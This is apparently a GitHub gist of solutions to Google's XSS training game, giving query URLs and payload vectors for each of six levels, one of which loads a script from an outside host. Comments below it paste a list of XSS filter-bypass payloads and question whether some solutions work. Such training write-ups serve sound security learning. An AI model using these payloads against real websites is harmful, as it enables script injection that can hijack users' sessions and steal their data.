-
-
Save djadmin/737a77b87d0bad8a9c79 to your computer and use it in GitHub Desktop.
| Below are the solutions to Google XSS challenges hosted on https://xss-game.appspot.com/ | |
| ########################## Level 1: Hello, world of XSS ########################## | |
| *** Query *** | |
| https://xss-game.appspot.com/level1/frame?query=<script>alert(1)</script> | |
| *** Vector *** | |
| <script>alert(1)</script> | |
| ########################## Level 2: Persistence is key ########################## | |
| *** Vector *** | |
| "><img src=x onerror=alert(1)> | |
| ########################## Level 3: That sinking feeling... ########################## | |
| *** Query *** | |
| https://xss-game.appspot.com/level3/frame#'/><script>alert(1)</script> | |
| *** Vector *** | |
| '/><script>alert(1)</script> | |
| ########################## Level 4: Context matters ########################## | |
| *** Query *** | |
| https://xss-game.appspot.com/level4/frame?timer=1')%3Balert('1 | |
| *** Vector *** | |
| 1')%3Balert('1 | |
| ########################## Level 5: Breaking protocol ########################## | |
| *** Query *** | |
| https://xss-game.appspot.com/level5/frame/signup?next=javascript:alert(1) | |
| *** Vector *** | |
| javascript:alert(1) | |
| ########################## Follow the 🐇 ########################## | |
| *** Query *** | |
| https://xss-game.appspot.com/level6/frame#HTTPS://dj-infosec.divshot.io/content.js | |
| *** Vector *** | |
| HTTPS://dj-infosec.divshot.io/content.js |
Good good this is link
"-prompt(8)-"
'-prompt(8)-'
";a=prompt,a()//
';a=prompt,a()//
'-eval("window'pro'%2B'mpt'")-'
"-eval("window'pro'%2B'mpt'")-"
"onclick=prompt(8)>"@x.y
"onclick=prompt(8)><svg/onload=prompt(8)>"@x.y
<image/src/onerror=prompt(8)>
<img/src/onerror=prompt(8)>
<image src/onerror=prompt(8)>
<img src/onerror=prompt(8)>
</scrip</script>t>
<script\x20type="text/javascript">javascript:alert(1);</script>
<script\x3Etype="text/javascript">javascript:alert(1);</script>
<script\x0Dtype="text/javascript">javascript:alert(1);</script>
<script\x09type="text/javascript">javascript:alert(1);</script>
<script\x0Ctype="text/javascript">javascript:alert(1);</script>
<script\x2Ftype="text/javascript">javascript:alert(1);</script>
<script\x0Atype="text/javascript">javascript:alert(1);</script>
'"><\x3Cscript>javascript:alert(1)</script> '"><\x00script>javascript:alert(1)</script>
'-eval("window'pro'%2B'mpt'")-'
'-eval("window'pro'%2B'mpt'")-'
'-eval("window'pro'%2B'mpt'")-'
Nothing is clear, please explain.
"-prompt(8)-"
'-prompt(8)-'
";a=prompt,a()//
';a=prompt,a()//
'-eval("window'pro'%2B'mpt'")-'
"-eval("window'pro'%2B'mpt'")-"
"onclick=prompt(8)>"@x.y
"onclick=prompt(8)><svg/onload=prompt(8)>"@x.y
<image/src/onerror=prompt(8)>
<img/src/onerror=prompt(8)>
<image src/onerror=prompt(8)>
<img src/onerror=prompt(8)>
</scrip</script>t>
<script\x20type="text/javascript">javascript:alert(1);</script>
<script\x3Etype="text/javascript">javascript:alert(1);</script>
<script\x0Dtype="text/javascript">javascript:alert(1);</script>
<script\x09type="text/javascript">javascript:alert(1);</script>
<script\x0Ctype="text/javascript">javascript:alert(1);</script>
<script\x2Ftype="text/javascript">javascript:alert(1);</script>
<script\x0Atype="text/javascript">javascript:alert(1);</script>
'"><\x3Cscript>javascript:alert(1)</script> '"><\x00script>javascript:alert(1)</script>
'-eval("window'pro'%2B'mpt'")-'
Note: Those aren't the only ways.
For example:
Also: At levels 3 and 6, you don't get any input/textarea element, so i have no damn ideea how you used those "Vector" solutions. As for level 5, something seemed odd to me, as i remembered having tried that "vector" solution, but i tried it again to make sure, and, as expected, it didn't work.